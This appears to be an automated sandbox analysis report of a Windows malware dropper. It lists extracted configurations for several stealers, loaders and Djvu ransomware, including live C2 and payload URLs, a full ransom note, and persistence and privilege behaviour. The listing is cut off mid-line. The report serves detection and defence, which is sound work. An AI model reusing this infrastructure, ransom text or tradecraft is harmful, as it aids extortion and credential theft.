Analysis
-
max time kernel
151s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
12-03-2022 09:27
Static task
static1
Behavioral task
behavioral1
Sample
8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe
Resource
win7-20220310-en
Behavioral task
behavioral2
Sample
8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe
Resource
win10v2004-en-20220113
General
-
Target
8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe
-
Size
9.1MB
-
MD5
663564f2c43b25ba18bf277ba0b9ab20
-
SHA1
1f5966a11de1ac03bd39c40292a8d5c0a5bb3d62
-
SHA256
8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4
-
SHA512
335486d893bd52a01867bc02776b6baf76fe867289e89b38267da3e5a33ac3c6fdb45c709fa18ba79eae19e8d626ac470e10a33dff50461961e2aebb11ec6879
Malware Config
Extracted
http://62.204.41.71/cs/SkyDrive.oo
Extracted
http://62.204.41.71/cs/Fax.oo
Extracted
http://62.204.41.71/cs/RED.oo
Extracted
http://62.204.41.71/Offer/Offer.oo
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
Extracted
metasploit
windows/single_exec
Extracted
vidar
39.9
933
https://prophefliloc.tumblr.com/
-
profile_id
933
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
Extracted
raccoon
1.7.3
92be0387873e54dd629b9bfa972c3a9a88e6726c
-
url4cnc
https://t.me/gishsunsetman
Extracted
raccoon
a26fbf1c2d0b49bb23b4438deef490ea1c53ab14
-
url4cnc
http://85.159.212.113/maverixsa
http://185.163.204.81/maverixsa
http://194.180.191.33/maverixsa
http://174.138.11.98/maverixsa
http://194.180.191.44/maverixsa
http://91.219.236.120/maverixsa
https://t.me/maverixsa
Extracted
djvu
http://fuyt.org/test3/get.php
-
extension
.xcbg
-
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
-
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn
Extracted
redline
PRO1203PRO
144.76.173.68:16125
-
auth_value
7a7fbf2ba1c874d2d5050d9184bd1348
Extracted
vidar
50.7
937
https://ruhr.social/@sam9al
https://koyu.space/@samsa2l
-
profile_id
937
Signatures
-
Detected Djvu ransomware 8 IoCs
Processes:
resource yara_rule behavioral2/memory/5072-281-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5072-284-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5144-280-0x0000000002240000-0x000000000235B000-memory.dmp family_djvu behavioral2/memory/5072-278-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/5072-276-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/7668-376-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/7668-382-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral2/memory/7668-370-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3232-184-0x0000000005270000-0x0000000005B96000-memory.dmp family_glupteba behavioral2/memory/3232-193-0x0000000000400000-0x000000000309C000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rUNdlL32.eXedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3092 744 rUNdlL32.eXe -
Raccoon Stealer Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/2008-201-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon behavioral2/memory/2008-204-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon behavioral2/memory/2008-205-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/6716-304-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Install.exe family_socelars C:\Users\Admin\AppData\Local\Temp\Install.exe family_socelars -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 1832 created 3232 1832 svchost.exe Info.exe -
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
-
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
OnlyLogger Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/5344-257-0x0000000001FC0000-0x0000000002004000-memory.dmp family_onlylogger behavioral2/memory/5344-258-0x0000000000400000-0x000000000048C000-memory.dmp family_onlylogger -
Vidar Stealer 3 IoCs
Processes:
resource yara_rule behavioral2/memory/4312-188-0x0000000000400000-0x0000000002CBE000-memory.dmp family_vidar behavioral2/memory/4312-189-0x0000000004900000-0x000000000499D000-memory.dmp family_vidar behavioral2/memory/440-275-0x0000000000400000-0x00000000004CE000-memory.dmp family_vidar -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 35 IoCs
Processes:
Files.exeKRSetp.exeInstall.exejfiag3g_gg.exeFolder.exeInfo.exeInstall_Files.exepub2.exejamesdirect.exeLitever01.exeComplete.exemd9_1sjm.exemsedge.exejfiag3g_gg.exeInfo.exe7E4KGS5KRYdTYM9UbhbVCkXW.exeZh8HfuR0H99IFab95QhRkd_A.exe2u2YsUgpyr8uoBqHizKdCUQM.exefind.exeWRV_nd3147gQ3tPAc_hVHB_8.exe_7j7HuriYtP_9nQOmZOUnbSw.exeUTyTq8w2BBV94iBaBtwpceVf.exeaCtrrIoeuw8gN6TISehzPUES.exeYStoivV3td8fghxqUu2SgpQ_.exeg5B8YLScVV_0zfy7P6hxlaVs.exey8vAvBD8LNXIpwE1EDcwkL93.exe8RKZYsnKNWccv71JTmpromDN.exeLPej8ron26c7SWsJgrCsKxFE.exeUkPQqosaxZEWN_UuknyJ6RgF.exe_XfxA3EI0PT3ie5OHUHFQLMm.execE8kh8YndrJJjfgDiRSXHBuB.exeb2B20UBKQvo9NdMQVBat3qrA.exeUasdIN9S3pk1MBF6e1GkKLMu.exebL85TOQU5EEEmVqgNQhYQtof.exepid process 3380 Files.exe 4556 KRSetp.exe 388 Install.exe 4056 jfiag3g_gg.exe 4600 Folder.exe 3232 Info.exe 4252 Install_Files.exe 4784 pub2.exe 4704 jamesdirect.exe 4312 Litever01.exe 1440 Complete.exe 1756 md9_1sjm.exe 4072 msedge.exe 4980 jfiag3g_gg.exe 3512 Info.exe 2008 7E4KGS5KRYdTYM9UbhbVCkXW.exe 4764 Zh8HfuR0H99IFab95QhRkd_A.exe 2008 7E4KGS5KRYdTYM9UbhbVCkXW.exe 944 2u2YsUgpyr8uoBqHizKdCUQM.exe 1920 find.exe 4596 WRV_nd3147gQ3tPAc_hVHB_8.exe 440 _7j7HuriYtP_9nQOmZOUnbSw.exe 5144 UTyTq8w2BBV94iBaBtwpceVf.exe 5152 aCtrrIoeuw8gN6TISehzPUES.exe 5168 YStoivV3td8fghxqUu2SgpQ_.exe 5208 g5B8YLScVV_0zfy7P6hxlaVs.exe 5216 y8vAvBD8LNXIpwE1EDcwkL93.exe 5284 8RKZYsnKNWccv71JTmpromDN.exe 5304 LPej8ron26c7SWsJgrCsKxFE.exe 5320 UkPQqosaxZEWN_UuknyJ6RgF.exe 5328 _XfxA3EI0PT3ie5OHUHFQLMm.exe 5344 cE8kh8YndrJJjfgDiRSXHBuB.exe 5448 b2B20UBKQvo9NdMQVBat3qrA.exe 5588 UasdIN9S3pk1MBF6e1GkKLMu.exe 5596 bL85TOQU5EEEmVqgNQhYQtof.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe upx C:\Users\Admin\Documents\y8vAvBD8LNXIpwE1EDcwkL93.exe upx C:\Users\Admin\Documents\aCtrrIoeuw8gN6TISehzPUES.exe upx C:\Users\Admin\Documents\aCtrrIoeuw8gN6TISehzPUES.exe upx -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe vmprotect C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe vmprotect behavioral2/memory/1756-163-0x0000000000400000-0x000000000060D000-memory.dmp vmprotect -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
g5B8YLScVV_0zfy7P6hxlaVs.exey8vAvBD8LNXIpwE1EDcwkL93.exe8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exeFolder.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation g5B8YLScVV_0zfy7P6hxlaVs.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation y8vAvBD8LNXIpwE1EDcwkL93.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation Folder.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 3324 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Files.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex" Files.exe -
Processes:
md9_1sjm.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 17 ipinfo.io 229 ipinfo.io 230 ipinfo.io 326 ipinfo.io 342 ipinfo.io 8 ip-api.com 18 ipinfo.io 24 ipinfo.io 327 ipinfo.io 353 ipinfo.io 384 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
7E4KGS5KRYdTYM9UbhbVCkXW.exepid process 2008 7E4KGS5KRYdTYM9UbhbVCkXW.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
jamesdirect.exedescription pid process target process PID 4704 set thread context of 2008 4704 jamesdirect.exe 7E4KGS5KRYdTYM9UbhbVCkXW.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 22 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3644 3324 WerFault.exe rundll32.exe 3896 2008 WerFault.exe jamesdirect.exe 5748 4764 WerFault.exe Zh8HfuR0H99IFab95QhRkd_A.exe 5936 5284 WerFault.exe 6008 5304 WerFault.exe LPej8ron26c7SWsJgrCsKxFE.exe 3880 5344 WerFault.exe cE8kh8YndrJJjfgDiRSXHBuB.exe 5952 5304 WerFault.exe LPej8ron26c7SWsJgrCsKxFE.exe 6332 2008 WerFault.exe 7E4KGS5KRYdTYM9UbhbVCkXW.exe 6496 5344 WerFault.exe cE8kh8YndrJJjfgDiRSXHBuB.exe 2696 4596 WerFault.exe WRV_nd3147gQ3tPAc_hVHB_8.exe 7896 6556 WerFault.exe onGvjMU2m141G5PV7GmGrEm_.exe 7360 6928 WerFault.exe 2500 4764 WerFault.exe Zh8HfuR0H99IFab95QhRkd_A.exe 8108 6780 WerFault.exe 3LYRJa_h21qcP23mkEqZVhGK.exe 7432 5344 WerFault.exe cE8kh8YndrJJjfgDiRSXHBuB.exe 3580 7668 WerFault.exe qwVE9lVPJ5BFPzZyglrA04yI.exe 5416 6928 WerFault.exe hvjoV9uoVBrkQ52viZaB6CDF.exe 8148 7200 WerFault.exe mNNTeptv39xQbiKXUFJlGYda.exe 6392 6780 WerFault.exe 3LYRJa_h21qcP23mkEqZVhGK.exe 772 6592 WerFault.exe bNDiBhKxC6KPXgLxJ0eAvuwe.exe 1712 6140 WerFault.exe powershell.exe 2552 5344 WerFault.exe cE8kh8YndrJJjfgDiRSXHBuB.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
pub2.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI pub2.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 4220 schtasks.exe 5336 schtasks.exe 6760 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1172 timeout.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 7044 tasklist.exe 7040 tasklist.exe 3580 tasklist.exe 5516 tasklist.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 1408 taskkill.exe 7628 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Processes:
Litever01.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Litever01.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Litever01.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
jfiag3g_gg.exemsedge.exepub2.exemsedge.exepid process 4980 jfiag3g_gg.exe 4980 jfiag3g_gg.exe 4836 msedge.exe 4836 msedge.exe 4784 pub2.exe 4784 pub2.exe 3696 msedge.exe 3696 msedge.exe 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 3028 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pub2.exepid process 4784 pub2.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
msedge.exepid process 3696 msedge.exe 3696 msedge.exe 3696 msedge.exe 3696 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Install.exeKRSetp.exetaskkill.exemd9_1sjm.exeInfo.exejamesdirect.exesvchost.exefind.exedescription pid process Token: SeCreateTokenPrivilege 388 Install.exe Token: SeAssignPrimaryTokenPrivilege 388 Install.exe Token: SeLockMemoryPrivilege 388 Install.exe Token: SeIncreaseQuotaPrivilege 388 Install.exe Token: SeMachineAccountPrivilege 388 Install.exe Token: SeTcbPrivilege 388 Install.exe Token: SeSecurityPrivilege 388 Install.exe Token: SeTakeOwnershipPrivilege 388 Install.exe Token: SeLoadDriverPrivilege 388 Install.exe Token: SeSystemProfilePrivilege 388 Install.exe Token: SeSystemtimePrivilege 388 Install.exe Token: SeProfSingleProcessPrivilege 388 Install.exe Token: SeIncBasePriorityPrivilege 388 Install.exe Token: SeCreatePagefilePrivilege 388 Install.exe Token: SeCreatePermanentPrivilege 388 Install.exe Token: SeBackupPrivilege 388 Install.exe Token: SeRestorePrivilege 388 Install.exe Token: SeShutdownPrivilege 388 Install.exe Token: SeDebugPrivilege 388 Install.exe Token: SeAuditPrivilege 388 Install.exe Token: SeSystemEnvironmentPrivilege 388 Install.exe Token: SeChangeNotifyPrivilege 388 Install.exe Token: SeRemoteShutdownPrivilege 388 Install.exe Token: SeUndockPrivilege 388 Install.exe Token: SeSyncAgentPrivilege 388 Install.exe Token: SeEnableDelegationPrivilege 388 Install.exe Token: SeManageVolumePrivilege 388 Install.exe Token: SeImpersonatePrivilege 388 Install.exe Token: SeCreateGlobalPrivilege 388 Install.exe Token: 31 388 Install.exe Token: 32 388 Install.exe Token: 33 388 Install.exe Token: 34 388 Install.exe Token: 35 388 Install.exe Token: SeDebugPrivilege 4556 KRSetp.exe Token: SeDebugPrivilege 1408 taskkill.exe Token: SeManageVolumePrivilege 1756 md9_1sjm.exe Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeDebugPrivilege 3232 Info.exe Token: SeImpersonatePrivilege 3232 Info.exe Token: SeDebugPrivilege 4704 jamesdirect.exe Token: SeTcbPrivilege 1832 svchost.exe Token: SeTcbPrivilege 1832 svchost.exe Token: SeManageVolumePrivilege 1756 md9_1sjm.exe Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeDebugPrivilege 1920 find.exe Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 Token: SeShutdownPrivilege 3028 Token: SeCreatePagefilePrivilege 3028 -
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
msedge.exepid process 3696 msedge.exe 3696 msedge.exe 3696 msedge.exe -
Suspicious use of SetWindowsHookEx 18 IoCs
Processes:
Install_Files.exeComplete.exe7E4KGS5KRYdTYM9UbhbVCkXW.exeZh8HfuR0H99IFab95QhRkd_A.exeWRV_nd3147gQ3tPAc_hVHB_8.exe_7j7HuriYtP_9nQOmZOUnbSw.exeUTyTq8w2BBV94iBaBtwpceVf.exeg5B8YLScVV_0zfy7P6hxlaVs.exe_XfxA3EI0PT3ie5OHUHFQLMm.execE8kh8YndrJJjfgDiRSXHBuB.exeb2B20UBKQvo9NdMQVBat3qrA.exey8vAvBD8LNXIpwE1EDcwkL93.exe8RKZYsnKNWccv71JTmpromDN.exeUkPQqosaxZEWN_UuknyJ6RgF.exeYStoivV3td8fghxqUu2SgpQ_.exeLPej8ron26c7SWsJgrCsKxFE.exeUasdIN9S3pk1MBF6e1GkKLMu.exepid process 4252 Install_Files.exe 1440 Complete.exe 2008 7E4KGS5KRYdTYM9UbhbVCkXW.exe 4764 Zh8HfuR0H99IFab95QhRkd_A.exe 4596 WRV_nd3147gQ3tPAc_hVHB_8.exe 440 _7j7HuriYtP_9nQOmZOUnbSw.exe 5144 UTyTq8w2BBV94iBaBtwpceVf.exe 5208 g5B8YLScVV_0zfy7P6hxlaVs.exe 5328 _XfxA3EI0PT3ie5OHUHFQLMm.exe 5344 cE8kh8YndrJJjfgDiRSXHBuB.exe 5448 b2B20UBKQvo9NdMQVBat3qrA.exe 5216 y8vAvBD8LNXIpwE1EDcwkL93.exe 5284 8RKZYsnKNWccv71JTmpromDN.exe 5320 UkPQqosaxZEWN_UuknyJ6RgF.exe 5168 YStoivV3td8fghxqUu2SgpQ_.exe 5304 LPej8ron26c7SWsJgrCsKxFE.exe 5588 UasdIN9S3pk1MBF6e1GkKLMu.exe 5216 y8vAvBD8LNXIpwE1EDcwkL93.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exeFiles.exemsedge.exeFolder.exeInstall.exedescription pid process target process PID 2256 wrote to memory of 3380 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Files.exe PID 2256 wrote to memory of 3380 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Files.exe PID 2256 wrote to memory of 3380 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Files.exe PID 2256 wrote to memory of 4556 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe KRSetp.exe PID 2256 wrote to memory of 4556 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe KRSetp.exe PID 2256 wrote to memory of 388 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Install.exe PID 2256 wrote to memory of 388 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Install.exe PID 2256 wrote to memory of 388 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Install.exe PID 3380 wrote to memory of 4056 3380 Files.exe jfiag3g_gg.exe PID 3380 wrote to memory of 4056 3380 Files.exe jfiag3g_gg.exe PID 3380 wrote to memory of 4056 3380 Files.exe jfiag3g_gg.exe PID 2256 wrote to memory of 3696 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe msedge.exe PID 2256 wrote to memory of 3696 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe msedge.exe PID 2256 wrote to memory of 4600 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Folder.exe PID 2256 wrote to memory of 4600 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Folder.exe PID 2256 wrote to memory of 4600 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Folder.exe PID 2256 wrote to memory of 3232 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Info.exe PID 2256 wrote to memory of 3232 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Info.exe PID 2256 wrote to memory of 3232 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Info.exe PID 3696 wrote to memory of 4608 3696 msedge.exe msedge.exe PID 3696 wrote to memory of 4608 3696 msedge.exe msedge.exe PID 2256 wrote to memory of 4252 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Install_Files.exe PID 2256 wrote to memory of 4252 2256 8ccbdda3d7269ba203ae36ccac8a230031248929bfafee524765eb9d1d0985e4.exe Install_Files.exe PID 2256 wrote to memory of 4252 2256 